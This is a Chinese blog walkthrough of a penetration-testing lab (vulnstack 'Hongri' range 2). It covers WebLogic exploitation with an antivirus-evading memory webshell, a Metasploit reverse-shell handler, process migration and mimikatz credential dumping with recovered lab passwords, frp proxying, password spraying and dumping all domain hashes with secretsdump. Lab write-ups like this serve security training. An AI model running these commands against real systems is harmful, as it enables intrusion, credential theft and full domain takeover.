ATT&CK实战:红日靶场二

已于 2023-06-19 14:47:17 修改
阅读量698 收藏 6
点赞数
分类专栏: ATT&CT靶场 文章标签: 网络 安全 网络安全
于 2023-06-19 14:38:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuzixuan0207/article/details/131287593
版权

信息收集

扫描C段 发现两个ip存活 其中一个开放80端口可7001端口

sudo nmap -sS 192.168.91.171/24 -Pn -T4

Web渗透

猜测存在weblogic(默认端口7001)访问

http://192.168.91.181:7001

发现weblogic 使用工具注入内存马 ,上传正常的马子连接不上 ,因目标机器安装了360 会被杀掉 内存马有一定的免杀性

存在漏洞

注入内存马 哥斯拉连接

连接成功

内网渗透

执行whoami命令 可知当前用户的权限为管理员权限 直接反弹shell到msf 方便操作

msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

哥斯拉填写开启msf的ip和监听端口 点击Go反弹到msf

成功反弹

下面开始主机信息收集

抓密码

load kiwi
creds_tspkg

需要system权限

这里因为有360 所以getsystem命令并不能提权成功 可以使用进程迁移到高权限进程

查看进程 发现很多system权限开启的进程

随机挑选一个 迁移进程

migrate 2572

继续抓密码

抓到两个密码

Username       Domain  Password
--------       ------  --------
Administrator  DE1AY   P@ss1234
mssql          DE1AY   1qaz@WSX

3389连到web主机

xfreerdp /u:"administrator" /d:"de1ay.com" /v:192.168.91.181:3389

进行域内信息收集

发现如下信息

双网卡 10.10.10.80
存在域 de1ay.com
域控 DC.de1ay.com 10.10.10.10

域用户:
    \\DC.de1ay.com 的用户帐户

-------------------------------------------------------------------------------
Administrator            de1ay                    Guest
krbtgt                   mssql

存在主机两个:
    PC$                      WEB$

上传frpc 创建代理

探测内网主机

proxychains -q msfconsole -q
use auxiliary/scanner/portscan/tcp
set rhosts 10.10.10.10/24
set ports 445,135,80,8080
set threads 100
run

密码喷洒 发现可以登录三台主机

proxychains -q crackmapexec smb 10.10.10.80/24 -u administrator -p P@ss1234

使用远程桌面直接登录三台主机

DC 连接3389 需要特别注意tls协议

proxychains -q xfreerdp /u:"administrator" /d:"de1ay.com" /v:10.10.10.10:3389  -tls-seclevel:0

获取域内所有用户hash

proxychains -q secretsdump.py de1ay.com/administrator:P@ss1234@10.10.10.10 -just-dc

至此 此个靶场渗透完毕

ssp@
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶场2
weixin_48169878的博客
07-10 4692
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
靶场(二)
qq_58091216的博客
05-02 2036
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
内网渗透靶场2
m0_62008601的博客
01-15 1815
学习内网渗透中,记录一下一些思路
靶场
最新发布
weixin_53665747的博客
09-24 281
仅主机1模拟外网,仅主机2模拟内网这里配置web,mssql双网卡这里实际环境可以不用nat,但是我有些工具放到主机里了方便起见还是用了一个nat。
vulnstack()内网渗透靶场二: 免杀360拿下域控
xf555er的博客
05-30 2227
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
ATT&CK队评估实战靶场二【胎儿教学】
weixin_47536169的博客
11-19 1900
ATT&CK队评估实战靶场二【胎儿教学】
ATT&CK入门:检测和分析1
08-04
ATT&CK入门:检测和分析1 本资源摘要信息将对ATT&CK入门:检测和分析进行详细的解释和分析,从标题、描述、标签和部分内容中提取相关知识点。 ATT&CK入门 ATT&CK是一种网络安全框架,旨在帮助安全团队检测和...
(14条消息) 安全vulnstack-ATT&CK实战系列 实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 安全vulnstack-ATT&CK实战系列 实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
tram:威胁报告ATT&CK:trade_mark:映射(TRAM)是一种工具,可帮助分析师将完成的报告映射到ATT&CK
05-12
TRAM v0.5 威胁报告ATT&CK:registered:映射(TRAM)是一种工具来辅助分析师映射完成报告ATT&CK。 TRAM目前处于测试阶段,并且正在积极开发中。要求 (3.7+) Google Chrome是我们唯一受支持/经过测试的浏览器安装...
ATT&CK靶场
hjxhjx1589的博客
07-28 1888
欢迎大家一起学习团队的靶场二,可以学习域渗透,web,内网渗透等相关内容。
靶场vulnstack2(上)
errorr0
05-27 1276
2环境搭建
网络安全工具 Godzilla 哥斯拉内存马使用
SHELLCODE_8BIT的博客
09-03 3204
测试时把生成的 shell.jsp 放到 tomcat webapps 下的任意一个可以访问的 web app 目录里,比如 webapps/ROOT 目录下,启动 tomcat 后访问 shell.jsp,返回页面没有报错即成功。测试环境:tomcat、Godzilla、jdk11。添加管理的 shell。
干货|冰蝎、哥斯拉 内存马应急排查
m0_60571990的博客
12-29 6818
干货|冰蝎、哥斯拉 内存马应急排查
Linux下采用ss5搭建sock5服务器&使用proxychains进行sock5客户端代理
冰之杍的博客
08-29 3013
Linux下采用ss5搭建sock5服务器&使用proxychains进行sock5客户端代理1.ss5搭建sock5服务器1.1下载ss5源码1.2安装相关yum依赖1.3编绎安装1.4修改SS5配置文件1.5给bash文件增加可执行权限/etc/rc.d/init.d/ss51.6启动/停止/重启ss51.7如果需要开启账号密码认证1.8如果需要修改默认的1080端口2.proxychains-ng搭建sock5客户端2.1下载proxychains2.2编绎安装 1.ss5搭建sock5服务
Centos系统安装proxychains
山塘小鱼儿的博客
02-20 3394
Centos系统安装proxychains linux下代理一般是通过http_proxy和https_proxy这两个环境变量,但是很多软件并不使用这两个变量,导致流量无法走代理。 在不使用vpn的前提下,linux并没有转发所有流量的真全局代理。但是可以用proxychains-ng为程序指定走代 理,proxychains-ng是proxychains的加强版,主要有以下功能: 1、支持http/https/socks4/socks5 2、支持认证 3、远端dns查询 4、多种代理模式 不足
安全vulnstack-ATT&CK实战系列 实战(四)
遇事不决冲冲冲
03-29 8290
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
ATT\\\\&CK队评估实战靶场
08-16
ATT&CK队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库志写入马来获取会话。具体的方法和之前的靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK队评估(靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值